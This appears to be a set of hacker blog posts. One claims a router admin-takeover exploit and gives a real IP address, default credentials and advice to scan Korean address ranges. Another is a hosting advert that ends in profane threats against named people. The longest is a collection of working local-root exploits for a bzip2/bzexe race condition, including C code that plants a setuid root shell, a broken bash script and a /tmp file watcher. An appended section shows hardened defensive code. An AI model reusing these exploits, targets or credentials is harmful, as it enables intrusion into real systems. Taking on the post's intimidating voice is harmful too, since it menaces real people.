
PoC : WindWeb/2.0 Server admin add exploit, carnage for ANY .kr/.tw! Kept pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

I'll make it short and sweet, but I can tell you NOW, this is usable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443, in which Netgear, and obviously this brand, doesn't :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like, you will need to find your OWN index.html, as this MUST be simply changed, so, when you find, an example would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in their admin page BUT this is accessed remotely... and, locally then after you change the pass ... I doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can be very VERY nice... but I'm not going to hand out a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0
Connection: close
Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT GLOW WILL BEAT ANYONE,OFFER GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING/INCLUDES SOME WEB HOSTING EVEN IN SOME SPECIAL CASES IF THATS WHAT IS WANTED THEN GLOW WILL DOIT, IPV6 AND IPV4,THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT MOMENT IN MIDDLE OF PURCHASING THE DEDIS, AND, THE COLO BOX :D

REALLY GLOW COULD IOPEN AN HAVE OPENED AGES AGO, BUT, THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES..SO I GUES THEYRE USABLE BUT, THEYRE JUST GOING TO ACTUALLY COMPETE, SOON…WICH WILL BE GREAT FOR EFNET.. AS, IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR AWHILE, WILL REALLY BE ADMINISTRATING THNGS, ALTHO, IT WILL BE ONLY THE SAME OWNER AS BEFORE *MOUSE_*WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN, WILL HAVE AN ADMIN OR ONE AND ONE CO ADMIN  PER BOX WICH WILL BE ON CALL 24/7 AND IF NOT YOU GET 1MONTH REFUND, YEP THATS THE TRUTH, IF YOU ENTER, AND, ARE CUSTOMER, AND ARE NOT HELPED WITHIN, 15MINUTES OF YOUR CHANNEL STAY, THE MONTH OR, A VHOST, SOMETHING, IS AUTOMATICALLY AND MAGICALLY, FREE!!! CANT BEAT THAT FOR SERVICE,ATLEAST YA KNOW IT GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE ,WE DECIDED TO MAKE 100% UPTIME BOXES,AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OFCOURSE, WICH SITS ON A 4000GBPS ANTI D0S NETWORK.IT IS THE BEST GLOW IS ABLE AND CAN DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING, AND REQUORES VERY HIGH ID FOR JUST AX, IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUPS I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE AND, BOASTING ALREADY 400 VHOSTS JUST IN IPV6, WICH HALF ARE NOT EVEN TURNED ON APPRENTLY..MEANING, THEY HAVE OMUCH, THEY REALLY NOW, JUST WANT TO MAKE IT SHARED AND, FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPAX ETC, WELL, HOW CAN YA BEAT, A LOGIN WICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CANT, IT IS PERFECT, YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO, YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW AS IT IS ON THE VPS GTCOMM, IT IS ALREADY HOSTING VERY EASILY, OVER 5-6 PEOPLE AND, THATS WITH OVER 30 WRAITHS NOW..AND NOT ONE BIT OF LAG.

ALTHO THERE WILLBE A COLO BOX THIS WONT BE OPENING FOR ATLEAST ONE MONTH BUT THE DEDIS WILL OPEN THIS WEEK,AND THE VPS IS ACTUALLY UP,IS FINE FOR HOSTING SO GLOW HAVE ALREADY BEEN NOW ACEEPTNIG NEW PEOPLE WHO  ARE SIMPLY FEDUP WITH ONE BOX/LOCATION AND/OR, SIMPLY KNOW THE DEICATION GLOWSHELLS HAS ALWAYS HAD WITH EFNET.

AS I UNDERSTAND IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS WHO, WELL I ASSUME THOSE WERE OLD PLACES USED..

 

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND, HE IS NOT HALF BAD WHEN YOU ACTUALLY ARE NOT CALLING HIM AN A**E ETC..

 

ANYHOW FACT IS, GLOWSHELLS HAS AND ALWAYS WILL BE LIKE NO-OTHER, AND AT MOMENT IF YOUR INTERESTED IN ANYTHING THEN, HEAD TO EFNET IRC IRC.EFNET.ORG AND JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT AND, WELL IM JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE :D

 

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

 

NOW READ ON…

 

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.

JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU :)

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

Bzexe (bzip2 and possibly bunzip2) race condition->localroot

Posted on 1st November 2011 in Codes, Exploits

CVE-2011-4089 – bzip2/bzexe Local root race condition
OK since there has been a lot of chatter about this on seclists.org and FD… I decided to give credit where it is due… Firstly a brief outline of the bug…
bzexe is now apparently ALSO the same code as bzip2, which would mean that this would be updated in the way of possible races to be won…
Anyhow, many talks with lh/loophole, bugz, vladz, Benjamin Renaut, kcope and others have shown me ways to exploit it… and yes it is possible, and even with bzip2… now, let's look at it a bit..
Here is PoC main updated also in the newer post on this :

Affected is about every distro which has bzip2 or bzexe, pick your binary and compress some file with that binary, then launch this exploit with ./exploit my-compressed-file, wait for root..

/*
   bzexec_PoC.c -- bzip2 (bzexe) race condition PoC (CVE-2011-4089)

   Author:    vladz (http://vladz.devzero.fr)
   Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

   This PoC exploits a race condition in the bzexe script.  This tool is
   rarely used so I wasn't supposed to write an exploit.  But some people
   on the full-disclosure list had doubts about this exploitation.  Public
   discussion about this issue started from this post:
   http://seclists.org/fulldisclosure/2011/Oct/776.

   I am using Inotify to win the race (on my dual-core, it succeed 100%).
      Usage: ./bzexe_PoC <command_name>

   For instance, if "/bin/dd" has already been compressed with bzexe,
   launch:
      $ ./bzexe_PoC dd
      [*] launching attack against "dd"
      [+] creating evil script (/tmp/evil)
      [+] creating target directory (/tmp/dd)
      [+] initialize inotify
      [+] waiting for root to launch "dd"
      [+] opening root shell
      # whoami
      root
*/
#define _GNU_SOURCE
#include <sys/inotify.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>

int create_nasty_shell(char *file) {
  char *s = "#!/bin/bash\n"
            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
            "gcc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
            "chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n";

  int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
  write(fd, s, strlen(s));
  close(fd);
  return 0;
}

int main(int argc, char **argv) {
  int fd, wd;
  char buf[1], *targetpath,*evilsh = "/tmp/evil", *trash = "/tmp/trash";
  if (argc < 2) {
    printf("usage: %s <cmd name>\n", argv[0]);
    return 1;
  }
  printf("[*] launching attack against \"%s\"\n", argv[1]);
  printf("[+] creating evil script (/tmp/evil)\n");
  create_nasty_shell(evilsh);
  targetpath = malloc(sizeof(argv[1]) + 6);
  sprintf(targetpath, "/tmp/%s", argv[1]);
  printf("[+] creating target directory (%s)\n", targetpath);
  mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);
  printf("[+] initialize inotify\n");
  fd = inotify_init();
  wd = inotify_add_watch(fd, targetpath, IN_CREATE);
  printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
  syscall(SYS_read, fd, buf, 1);
  syscall(SYS_rename, targetpath,  trash);
  syscall(SYS_rename, evilsh, targetpath);
  inotify_rm_watch(fd, wd);
  printf("[+] opening root shell (/tmp/sh)\n");
  sleep(2);
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
  return 0;
}

That's the latest code and yes, wins every race…

The exploit works as follows.
This isn't refined (why bother?) but worked.
1. determine which files are bzexe'd on a system say bash
2. create a matching directory you own in /tmp
3. create a exploit script in /tmp

4. watch for the existence of /tmp/bash/gztmp* we want to know before the gztmp file is renamed to bash.
larry@b0rk:~$ while (true) do ./exp.sh ; done

#!/bin/bash
if [ -a /tmp/bash/gztmp* ]
then
echo "Exploting bzexe."
mv /tmp/bash /tmp/bash.dir
echo "Copying evil file into place."
cp /tmp/bad /tmp/bash
fi

This is a difficult race condition to win, but it can be won maybe 60% of
the time. Also my system is 256mb of ram @ 500mhz. Probably much easier
to win a race than on a dual core 3.0 ghz system?

Failures will show:
root@b0rk:/root# ./bash <-- missed copy
./bash: 22: /tmp/bash: not found

root@b0rk:/root# ./bash <-- race failed because permissions weren't set
yet on bash from cp
./bash: 22: /tmp/bash: Permission denied

Success will show:
root@b0rk:/root# ./bash
root@b0rk:/root# ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1024 2010-07-03 11:55 /etc/shadow

larry@b0rk:~$ while (true) do ./exp.sh ; done

Thank you for that, it was a very good description and also allows others to create a poc :)
Ohwish, here is one…

/*
  bzexe race condition POC  ////   on some boxes bzexe = bzip2 (exact code)
  Benjamin Renaut <ben@tokidev.fr>
  --
  Example of use:
  $ gcc bz.c -o bz -O3
  $ ./bz ls

  then in another shell (as root):
  # cp /bin/ls ./
  # bzexe ls
  # bzip2 ls
  # ./ls
-> and check /tmp/bzexe.xd
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <dirent.h>
#include <errno.h>

char* shellcode="#!/bin/sh\nsh >/tmp/bzexe.xd\n";

int write_shellcode(char* dest) {
  FILE* fdest=fopen(dest, "w");
  if(fdest==NULL)
    return(-1);
  if(chmod(dest, 0777))
    return(-1);
  fprintf(fdest, shellcode);
  fclose(fdest);
  return(0);
}

int main(int argc, char** argv) {
  DIR* tdir;
  struct dirent* tdirent;
  char dirname[4000];
  char target[4000];
  if(argc!=2) {
    printf("Usage: %s [ANY BINARY]\n", argv[0]);
    printf("- Will wait for BINARY to be executed (through bzexe/bzip2) and then will try and exploit it\n");
    return(0);
  }
  snprintf(dirname, 4000, "/tmp/%s", argv[1]);
  if(mkdir(dirname, 0777)) {
    perror("- mkdir");
    return(-1);
  }
  while(1) {
    tdir=opendir(dirname);
    if(tdir==NULL) {
      perror("- opendir");
      return(-1);
    }
    while((tdirent=readdir(tdir))!=NULL) {
      if((strncmp(tdirent->d_name, "gztmp", 5)==0) && (tdirent->d_type & DT_REG)) {
        snprintf(target, 4000, "%s/%s", dirname, tdirent->d_name);
        if(unlink(target)) {
          perror("- unlink");
          return(-1);
        }
        if(rmdir(dirname)) {
          perror("- rmdir");
          return(-1);
        }
        if(write_shellcode(dirname)) {
          printf("- Fail\n");
          return(-1);
        }
        printf("+ Success\n");
        return(0);
      }
    }
    closedir(tdir);
  }
  return(0);
}

Now that works great and, you just then with that .c, need to run ANY bzip2 or bzexe and bingo, you will have shell :)
It is tricky, but it is possible.. just use the info, and, it is tested and working.. this sh version would need tweaking but, it is a very good attempt to make a poc for a starters go, as it must be detached and execute the payload separately really for it to work, so maybe this would be better to have a .c file separate which simply makes the looping bzip2, then again, you could also use that code up there, and Inotify code made for ALL tmp./ which I will show a bit further on..

##////////////////exploit.sh
#!/bin/bash
##BZEXE/BZIP2 Compress<->Decompress race condition (local root exploit)
echo "~~ +[!] BZEXE/BZIP2/BUNZIP2 [Compress<->Decompress] Race condition & (LocalRoot) [!]+-~~"  >&2
cd /tmp
mkdir /bash/sh
chmod +x /bash/sh
dd if=/dev/zero bs=135k count=15000 of=/tmp/bash/shell
cat > /tmp/bash/bad << __EOF
#!/bin/sh
chmod 777 /tmp/bash/sh
__EOF
if [ /bin/bzexe ]
then
/bin/bzexe /tmp/bash/shell
echo ""  >&2
else
if [ /bin/bzip2 ]
then
/bin/bzip2 /tmp/bash/shell
echo ""  >&2
else
echo "[!!] Test: Decompression bug with: bunzip2 -d bug.bz2 .."  >&2
if [ /bin/bunzip2 && /tmp/bash/shell.bz2 ]
/bin/bunzip2 -d /tmp/bash/shell.bz2
echo "[-] "  >&2
ls -l shell.bz2
echo "[+] Test: bunzip2 -d is now running .."  >&2
then
if [ -a /tmp/bash/gztmp* ]
then
echo "[*] Trying the move/copy bad script.sh .."  >&2
mv /tmp/bash/shell /tmp/bash/bash.dir
cp /tmp/bash/bad /tmp/bash/sh
echo "[!] OK! We will check for our shell (2 places possible) .."  >&2
ls -l /tmp/bash/sh
ls -l /tmp/bash/bash.dir
./tmp/bash/sh
if [ /tmp/bash/sh ]
echo "-> Spawning rootshell .."  >&2
echo ""  >&2
else
if [ /tmp/bash/bash.dir ]
echo "-> UID0 - Have fun .."  >&2
echo ""  >&2
then
whoami
su
id
uptime
uname -ar
fi
fi
fi
fi
fi

That's the *first* PoC which was not really tested but looks to be on the right path for sure… it may need to have some tweaking but, that's at least 2 symlink problems here… now let's look at something else…
which, you could just let run, and it would CATCH all these exceptions:

/*
 * hax_inotify_tempracecardriver.c
 *
 * /tmp, /var/tmp, /usr/tmp inotify watch POC.
 * This will catch 100%* of mkstemp(), tmp files, etcetera usages in
 * the above directories.
 *
 * *[1] This is true if IN_Q_OVERFLOW is not reached.
 * You can check your max queued events by looking inside of:
 * /proc/sys/fs/inotify/max_queued_events
 * The value in this file is used when an application calls
 * inotify_init(2) to set an upper limit on the number of events that can
 * be queued to the corresponding inotify instance.  Events in excess of
 * this limit are dropped, but an IN_Q_OVERFLOW event is always generated.
 *
 * <Scrippie> 100% wut? liez and slander!
 * <lh> it can be 100% though if /proc/sys/fs/inotify/max_queued_events
 *      is larger than your avail inodes
 * <lh> i'm not that big of a liar :\
 * <kcope> dont try to be smarter than Scrippie :> <3
 * Example to determine inodes and update max_queued_events:
 * cd /proc/sys/fs/inotify/
 * tune2fs -l /dev/<FS>|grep "Inode count"|awk '{print $3}' > max_queued_events
 * *******************************************************************************
 * Modify accordingly for owning temp race conditions.
 * This will print detailed stat information regarding creation,
 * metadata changes (permissions, timestamps, extended attributes, etc.),
 * and deletion.
 * The inotify API provides a mechanism for monitoring file system
 * events, merged into the kernel since 2.6.13-R3.
 * Author: loophole/lh (Cody Tubbs) codytubbs@gmail.com 2011-05-27
 * HAX 2011
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <time.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h> /* read(), close() */

#define LOGFILE "tmpfiles.out"

#define BUF_LEN (1024*(16+16))
#define PATH "/tmp"
#define PATH2 "/var/tmp"
#define PATH3 "/usr/tmp"

int main(int argc, char **argv){
  int length, i, fd, wd, wd2, wd3;
  char buf[BUF_LEN];
  char fp[256];
  char type[56];
  struct stat sb;
  FILE *file;
  time_t ltime; /* calendar time */
  fd = inotify_init();
  if(fd < 0){ perror( "inotify_init" ); }
  file = fopen(LOGFILE, "a");
  wd = inotify_add_watch( fd, PATH, IN_CREATE | IN_ATTRIB | IN_DELETE);
  wd2 = inotify_add_watch( fd, PATH2, IN_CREATE | IN_ATTRIB | IN_DELETE);
  wd3 = inotify_add_watch( fd, PATH3, IN_CREATE | IN_ATTRIB | IN_DELETE);
  for(;;) {
    i=0;
    length = read(fd, buf, BUF_LEN);
    if (length < 0){ perror("read"); }
    while(i < length){
      struct inotify_event *event = (struct inotify_event *) &buf[i];
      if(event->len){
        if(event->mask & IN_CREATE){
          snprintf(type, sizeof(type), "BEEN CREATED");
          goto stat;
        } else if(event->mask & IN_ATTRIB){
          snprintf(type, sizeof(type), "ATTRIBUTE CHANGE(S)");
          goto stat;
        } else if(event->mask & IN_DELETE){
          snprintf(type, sizeof(type), "BEEN DELETED");
          ltime = time(NULL); // get current cal time
          printf("The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
          fprintf(file, "The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
          goto gettime;
        }
stat:;
        snprintf(fp, sizeof(fp), "%s/%s", PATH, event->name);
        if(stat(fp, &sb) == -1){
          snprintf(fp, sizeof(fp), "%s/%s", PATH2, event->name);
          if(stat(fp, &sb) == -1){
            snprintf(fp, sizeof(fp), "%s/%s", PATH3, event->name);
            if(stat(fp, &sb) == -1){
              perror("stat");
            }
          }
        }
        ltime = time(NULL); // get current cal time
        printf("The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
        fprintf(file, "The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
        printf("File type:                ");
        fprintf(file, "File type:                ");
        switch (sb.st_mode & S_IFMT){
          case S_IFBLK:  printf("block device\n");     fprintf(file, "block device\n");     break;
          case S_IFCHR:  printf("character device\n"); fprintf(file, "character device\n"); break;
          case S_IFDIR:  printf("directory\n");        fprintf(file, "directory\n");        break;
          case S_IFIFO:  printf("FIFO/pipe\n");        fprintf(file, "FIFO/pipe\n");        break;
          case S_IFLNK:  printf("symlink\n");          fprintf(file, "symlink\n");          break;
          case S_IFREG:  printf("regular file\n");     fprintf(file, "regular file\n");     break;
          case S_IFSOCK: printf("socket\n");           fprintf(file, "socket\n");           break;
          default:       printf("unknown?\n");         fprintf(file, "unknown?\n");         break;
        }
        printf("I-node number:            %ld\n", (long) sb.st_ino);
        printf("Mode:                     %lo (octal)\n", (unsigned long) sb.st_mode);
        printf("Link count:               %ld\n", (long) sb.st_nlink);
        printf("Ownership:                UID=%ld GID=%ld\n", (long) sb.st_uid, (long) sb.st_gid);
        printf("Preferred I/O block size: %ld bytes\n", (long) sb.st_blksize);
        printf("File size:                %lld bytes\n", (long long) sb.st_size);
        printf("Blocks allocated:         %lld\n", (long long) sb.st_blocks);
        printf("Last status change:       %s", ctime(&sb.st_ctime));
        printf("Last file access:         %s", ctime(&sb.st_atime));
        printf("Last file modification:   %s", ctime(&sb.st_mtime));
        fprintf(file, "I-node number:            %ld\n", (long) sb.st_ino);
        fprintf(file, "Mode:                     %lo (octal)\n", (unsigned long) sb.st_mode);
        fprintf(file, "Link count:               %ld\n", (long) sb.st_nlink);
        fprintf(file, "Ownership:                UID=%ld GID=%ld\n", (long) sb.st_uid, (long) sb.st_gid);
        fprintf(file, "Preferred I/O block size: %ld bytes\n", (long) sb.st_blksize);
        fprintf(file, "File size:                %lld bytes\n", (long long) sb.st_size);
        fprintf(file, "Blocks allocated:         %lld\n", (long long) sb.st_blocks);
        fprintf(file, "Last status change:       %s", ctime(&sb.st_ctime));
        fprintf(file, "Last file access:         %s", ctime(&sb.st_atime));
        fprintf(file, "Last file modification:   %s", ctime(&sb.st_mtime));
gettime:;
        printf("\n\n");
        fprintf(file, "\n\n");
      }
    i += sizeof(struct inotify_event) + event->len; /* event header plus name length */
    }
  }
  (void) inotify_rm_watch(fd, wd);
  (void) close(fd);
  fclose(file);
  exit(0);
}

Thx very much to LH :) for this which is very handy for catching *any* race, many of which we won't even see unless we can see the tmp files made from some backup scripts etc…
There is much more to this but, really it is trivial, and you could probably make a working bash script, and feel free to add a comment of a BETTER poc or email it to me and all credit will go to you :)
remember also, bzexe = bzip2 code, as they say online and, as the tarball is, also, this would possibly now link to bunzip2, and this is why the hax_inotify etc. are handy to see what tmpfiles are made, because the ln problem will most likely work for all 3 binaries, not ONLY bzexe/bzip2, those are definites.
Enjoy and thanks to all who helped on this one!
xd
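
The race in the post above depends on a predictable path under /tmp that another local user can create first. As an added example (not code from the original post, from bzip2, or from any of the PoC authors), this is the hardened pattern for an extractor: create an unpredictable 0700 directory with mkdtemp(3), validate the opened directory descriptor rather than the path, and create the payload with O_EXCL|O_NOFOLLOW relative to that descriptor. The function names and the `bzx.` prefix are assumptions made for the example.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 only if dirfd is a directory owned by us with no group/other access. */
int dir_is_private(int dirfd) {
  struct stat sb;
  if (fstat(dirfd, &sb) != 0) return 0;
  return S_ISDIR(sb.st_mode) && sb.st_uid == geteuid() &&
         (sb.st_mode & (S_IRWXG | S_IRWXO)) == 0;
}

/* Open path as a directory without following a symlink in the last
   component, then validate the opened object itself (fstat on the fd, so
   a later rename of the path cannot change what was checked). */
int open_private_dir(const char *path) {
  int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
  if (fd < 0) return -1;
  if (!dir_is_private(fd)) { close(fd); return -1; }
  return fd;
}

/* Create a fresh 0700 directory with an unpredictable name. tmpl must end
   in "XXXXXX" and is rewritten in place. Returns a directory fd or -1. */
int make_private_dir(char *tmpl) {
  if (mkdtemp(tmpl) == NULL) return -1;
  return open_private_dir(tmpl);
}

/* Write the payload relative to the directory fd. O_EXCL refuses a file
   that already exists; O_NOFOLLOW refuses a symlink. Returns 0 or -1. */
int write_payload(int dirfd, const char *name, const char *data, size_t len) {
  int fd = openat(dirfd, name,
                  O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0700);
  if (fd < 0) return -1;
  while (len > 0) {
    ssize_t n = write(fd, data, len);
    if (n < 0) {
      if (errno == EINTR) continue;
      close(fd);
      unlinkat(dirfd, name, 0);
      return -1;
    }
    data += n;
    len -= (size_t)n;
  }
  return close(fd);
}

int main(void) {
  char tmpl[] = "/tmp/bzx.XXXXXX"; /* constructed prefix, not bzexe's */
  int dfd = make_private_dir(tmpl);
  if (dfd < 0) { perror("make_private_dir"); return 1; }
  printf("private dir %s\n", tmpl);
  printf("first write:  %d\n", write_payload(dfd, "payload", "#!/bin/sh\n", 10));
  printf("second write: %d (name already exists)\n",
         write_payload(dfd, "payload", "#!/bin/sh\n", 10));
  /* A directory with group/other access, as a pre-created one would have,
     is rejected. */
  chmod(tmpl, 0777);
  printf("loose dir accepted: %s\n", open_private_dir(tmpl) >= 0 ? "yes" : "no");
  unlinkat(dfd, "payload", 0);
  close(dfd);
  rmdir(tmpl);
  return 0;
}
```

For a binary payload, executing through a still-open descriptor with fexecve(3) instead of re-resolving a path keeps the same guarantee at exec time.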